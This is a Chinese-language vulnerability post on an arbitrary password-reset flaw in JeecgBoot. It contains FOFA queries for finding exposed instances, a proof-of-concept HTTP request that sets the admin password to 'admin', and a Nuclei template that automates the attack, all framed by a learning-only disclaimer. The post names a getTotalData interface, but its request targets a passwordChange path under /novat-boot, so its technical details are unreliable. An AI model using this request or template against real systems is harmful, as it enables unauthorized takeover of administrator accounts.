免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述:
JeecgBoot getTotalData接口存在任意用户密码重置漏洞
影响版本:
JeecgBoot
FOFA:
title=="JeecgBoot 企业级低代码平台" || body="window._CONFIG['imgDomainURL'] = 'http://localhost:8080/jeecg-boot/" || title="Jeecg-Boot 企业级快速开发平台" || title="Jeecg 快速开发平台" || body="'http://fileview.jeecg.com/onlinePreview'" || title=="JeecgBoot 企业级低代码平台" || title=="Jeecg-Boot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title="Jeecg 快速开发平台" || title="Jeecg-Boot 快速开发平台" || body="积木报表" || body="jmreport"POC:
GET /novat-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone= HTTP/1.1
Host: {{Hostname}}
User-Agent: Nuclei
Accept: */*更改成功后可以看到返回内容success和password reset successfully。
nuclei模板
id: jeecgboot-password-reset
info:
name: JeecgBoot Password Reset Vulnerability
author: ProjectDiscoveryAI
severity: high
description: |
JeecgBoot framework's passwordChange endpoint allows arbitrary user password resets. This template checks for the vulnerability by sending a crafted request.
tags: jeecgboot,password-reset,vulnerability
http:
- raw:
- |
GET /novat-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone= HTTP/1.1
Host: {{Hostname}}
User-Agent: Nuclei
Accept: */*
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "success"
part: body
- type: regex
regex:
- "password reset successfully"
part: body通过nuclei模板快速定位内部资产是否存在安全漏洞。
——–
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
没有回复内容